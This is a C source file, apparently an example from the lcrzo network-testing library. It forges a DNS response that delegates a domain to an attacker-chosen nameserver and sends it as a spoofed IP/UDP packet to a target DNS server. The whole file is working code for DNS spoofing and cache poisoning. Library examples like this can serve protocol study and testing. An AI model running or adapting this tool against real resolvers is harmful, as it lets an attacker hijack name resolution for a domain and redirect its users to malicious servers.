
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000331=
{ /*reference*/     "lcrzoex", 331,
  /*version*/       1, 0,
  /*title*/         "{IP,UDP} spoof of a DNS response for a NS",
  /*french title*/  "spoof {IP,UDP} d'une reponse DNS pour un NS",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "ip_source_address dnsserver dst_port id ttl domain authns authnsip",
  /*french usage*/  "adresse_ip_source serveurdns port_dst id ttl domaine authns authnsip",
  /*usage example*/ "1.2.3.4 5.6.7.8 1234 45334 60 s.com ns.s.com 192.1.1.2",
  /*fr. usage ex.*/ "1.2.3.4 5.6.7.8 1234 45334 60 s.com ns.s.com 192.1.1.2", 
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000331_main(int argc, char *argv[]);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000331_main(int argc, char *argv[])
{ lcrzo_spoof spoof;
  lcrzo_hdrlip hdrlip;
  lcrzo_hdrludp hdrludp;
  lcrzo_ipl authnsip;
  lcrzo_data data;
  lcrzo_int32 datasize;
  lcrzo_uint32 ttl;
  lcrzo_uint16 id;

  lcrzo_init();
  if ( argc<9 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000331, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* initialize IP header */
  lcrzo_epr(lcrzo_hdrlip_initdefault(&hdrlip));
  lcrzo_epr(shared_para_ipl_init_src(argv[1], &(hdrlip.saddr)));
  lcrzo_epr(shared_para_ipl_init_dst(argv[2], &(hdrlip.daddr)));

  /* initialize UDP header */
  lcrzo_epr(lcrzo_hdrludp_initdefault(&hdrludp));
  hdrludp.sport=53;
  lcrzo_epr(shared_para_port_init_dst(argv[3], 0, &hdrludp.dport));
 
  /* create the packet */
  lcrzo_epr(lcrzo_ipl_init_hs(argv[8], &authnsip));
  lcrzo_epr(lcrzo_uint16_init_text(argv[4], &id));
  lcrzo_epr(lcrzo_uint32_init_text(argv[5], &ttl));
  lcrzo_epr(shared_dns_packet_resp_ns_initm(id, ttl,
					    argv[6], argv[7], authnsip,
					    &data, &datasize));

  /* spoof */
  lcrzo_epr(lcrzo_spoof_init(&spoof));
  lcrzo_epr(lcrzo_spoof_ipoptudpdata(&spoof, hdrlip, NULL, 0,
                                     hdrludp, data, (lcrzo_uint16)datasize));
  lcrzo_epr(lcrzo_spoof_close(&spoof));

  /* free */
  lcrzo_epr(lcrzo_data_free2(&data));
  lcrzo_close();
  return(LCRZO_ERR_OK);
}
